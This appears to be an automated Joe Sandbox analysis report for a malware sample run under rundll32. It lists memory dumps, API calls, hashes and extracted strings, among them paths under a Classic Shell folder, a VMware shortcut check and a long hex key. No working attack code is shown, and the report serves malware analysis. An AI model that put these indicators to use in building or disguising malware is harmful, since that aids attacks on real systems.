                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Open$QueryValue$CloseFileModuleName
                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                    • API String ID: 2701450724-3496071916
                    • Opcode ID: 4afd2b7b48ce371d30c337e2b12bd79f2a58c84e9ee2b4c594af9a85e795c04a
                    • Instruction ID: 05af0d7f2029f71a10c68c1639b48ed8a0d1e1dacfaf04c10325f7dc7332685a
                    • Opcode Fuzzy Hash: 4afd2b7b48ce371d30c337e2b12bd79f2a58c84e9ee2b4c594af9a85e795c04a
                    • Instruction Fuzzy Hash: 65610A71204BC589DB30DF71E8983DA23A5F78838CF51112A9B4D5BB5AEF78C695C348
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetUserDefaultUILanguage.KERNEL32 ref: 0041525E
                    • GetLocaleInfoW.KERNEL32 ref: 00415277
                      • Part of subcall function 00415080: FindFirstFileW.KERNEL32 ref: 004150B2
                      • Part of subcall function 00415080: FindClose.KERNEL32 ref: 004150CD
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                    • String ID:
                    • API String ID: 3216391948-0
                    • Opcode ID: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                    • Instruction ID: a21e750fdb81c3cb80ceca5676c95766672ab79d1740a75253142ae5867d54cb
                    • Opcode Fuzzy Hash: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                    • Instruction Fuzzy Hash: A321E476210A4089DB20EF76C8917D927A0EB88BDCF50212BFB4E57B69DF38C485C784
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 280 415080-4150c8 call 40ff70 call 411140 FindFirstFileW 285 4150d2-4150ec call 40fde0 280->285 286 4150ca-4150cd FindClose 280->286 286->285
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                    • Instruction ID: 042890e011036333e5bfd1d3754174ebbb35ecdb7fac3d7a8451519e581d693b
                    • Opcode Fuzzy Hash: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                    • Instruction Fuzzy Hash: E6F054622019C089CB71AF31C8952ED3710DB467ACF081336A66D4BBE5DE28C595C704
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 77607eee1d5678264bfe421cdc9063a8fc63e9aedb2fd9a36f7780363d09e058
                    • Instruction ID: e264c793b7b64b5e8e85e408dd1c0600ffa873e8f413e1ccae946c0973a85fc5
                    • Opcode Fuzzy Hash: 77607eee1d5678264bfe421cdc9063a8fc63e9aedb2fd9a36f7780363d09e058
                    • Instruction Fuzzy Hash: FB11E632604B4885EB50EF66D89139D2761F799BD8F44503AFA0E87B69DF38C4918384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000001.2181891398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_1_401000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6977ca529332a5fcc1d3b161347b54283f90750cbc2a723b4a5fb52c16195291
                    • Instruction ID: eb86fbaa6f94e342d27ac75906ab510fa41879bc408d40cfe529289e6fed6c7a
                    • Opcode Fuzzy Hash: 6977ca529332a5fcc1d3b161347b54283f90750cbc2a723b4a5fb52c16195291
                    • Instruction Fuzzy Hash: DAF06D3001188C4ACBB4FF29D8A9AEC7791EF4A318F44026AA81ED71E1DD285AA88744
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000001.2181891398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_1_401000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a0cfa698748bb64cedbfea9c0ae8b152c64f619fa36b2ae3542f32198d6df4e9
                    • Instruction ID: 21ac2a481705a99f5833024b097cff2b5eb32e4b948c073529bab5dd0ea454cf
                    • Opcode Fuzzy Hash: a0cfa698748bb64cedbfea9c0ae8b152c64f619fa36b2ae3542f32198d6df4e9
                    • Instruction Fuzzy Hash: B5B09239468EC847CA02B734C94248A72B2FA90B08F800619F48692190ED2D9A2887C6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • Sleep.KERNEL32 ref: 0080F91E
                      • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CAC
                      • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CC5
                    • Sleep.KERNEL32 ref: 0080F98C
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID: .exe$0~$ClassicIE_64$Romania Knives$bucket1$bucket2$bucket3
                    • API String ID: 3472027048-4255013377
                    • Opcode ID: 0882209e26abb17ff6f997946ea9b4464907374c55c834a51b1b22f6d9c6d62e
                    • Instruction ID: 5d250b9ed75b9a8aaf0cfb9770c26032a61d01ab42eb7c904a683a03c819acb6
                    • Opcode Fuzzy Hash: 0882209e26abb17ff6f997946ea9b4464907374c55c834a51b1b22f6d9c6d62e
                    • Instruction Fuzzy Hash: B671CD76210B85D8DB60EF66D8A13D93325F78479CF809026EB4D4BB6ADF78C649C384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetMessageW.USER32 ref: 00816038
                      • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                    • Sleep.KERNEL32 ref: 00815FC0
                    Strings
                    • 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F, xrefs: 00815FF1
                    • \VMware Workstation.lnk, xrefs: 00815F58
                    • C:\Program Files\Classic Shell\cache, xrefs: 00815FC5, 00815FD7
                    • C:\Program Files\Classic Shell\whq.zip, xrefs: 00816004
                    • C:\Program Files\Classic Shell, xrefs: 00815F9C, 00815FAE
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
